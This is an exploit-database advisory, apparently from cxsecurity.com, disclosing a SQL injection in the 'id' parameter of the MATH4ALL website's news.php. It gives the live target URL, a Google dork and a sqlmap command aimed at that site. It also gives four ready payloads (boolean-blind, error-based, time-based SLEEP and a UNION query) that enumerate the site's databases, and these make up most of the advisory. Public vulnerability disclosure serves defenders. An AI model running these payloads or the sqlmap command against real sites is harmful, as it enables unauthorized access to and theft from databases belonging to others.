MATH4ALL - SQL Injection vulnerability

2020.09.23
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

**************************** #Exploit Title: MATH4ALL - SQL Injection vulnerability #Date: 2020-09-21 #Exploit Author: Mahdi Karimi #Vendor Homepage: http://www.math4all.in #Google Dork: news.php?id=6 #Tested On: windows 10 sqlmap: sqlmap -u "http://www.math4all.in/news.php?id=6" --dbs Testing Method; - boolean-based blind - UNION query - error-based - AND/OR time-based blind Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=6' AND 9927=9927 AND 'MVTV'='MVTV Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=6' AND (SELECT 5358 FROM(SELECT COUNT(*),CONCAT(0x7170706a71,(SELECT (ELT(5358=5358,1))),0x71626b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'WsTI'='WsTI Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=6' AND SLEEP(5) AND 'Snog'='Snog Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: id=-2383' UNION ALL SELECT NULL,CONCAT(0x7170706a71,0x7256496d4c456b7065444862686c47465641667047446f577a4b73447261654b4875495067775a74,0x71626b6a71),NULL,NULL,NULL,NULL-- IupF ************************************************** #Discovered by: Mahdi Karimi #Email : mjoker22mjoker22@gmail.com **************************************************


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top